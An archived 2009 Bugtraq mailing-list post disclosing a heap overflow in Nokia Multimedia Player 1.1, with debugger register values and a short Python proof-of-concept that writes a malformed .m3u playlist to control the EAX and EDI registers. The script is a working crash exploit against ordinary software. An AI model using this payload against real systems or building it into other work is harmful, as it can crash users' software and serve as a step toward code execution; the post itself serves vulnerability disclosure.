lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200902031310.n13DAxdb024135@www5.securityfocus.com>
Date: Tue, 3 Feb 2009 06:10:59 -0700
From: 0in.email@...il.com
To: bugtraq@...urityfocus.com
Subject: Nokia Multimedia Player v1.1 .m3u Heap Overflow PoC exploit

# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]
#   http://www.Dark-Coders.pl
#   Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.")
#   Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH
#       Nokia Multimedia Player is a element of Nokia PC Suite packet.
#       DOWNLOAD:http://europe.nokia.com/A4144905
#           Vuln:
#                   This is heap overflow vuln, we can control EAX & EDI registers
#                   (on my Windows XP sp3) with UNICODE chars...
#           DEBUG:
#                       "Access violation when reading [00130013]" 
#                        EAX 00130013  <- ! 
#                        EDX 00000000
#                        EBX 00970000
#                        ESP 0012F96C
#                        EBP 0012FB8C
#                        ESI 00AD26B0
#                        EDI 00900011  <- ! 
#                        EIP 7C910CB0 ntdll.7C910CB0
#!/usr/bin/python
eax="\x13\x13" # eax : 00130013
edi="\x11\x90"  # edi : 00900011
buf="F"*261
buf+=edi+eax
buf+="B"*235
file_name="spl0.m3u"
ce=buf
f=open(file_name,'w')
f.write(ce)
f.close()
print 'PoC created!'

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ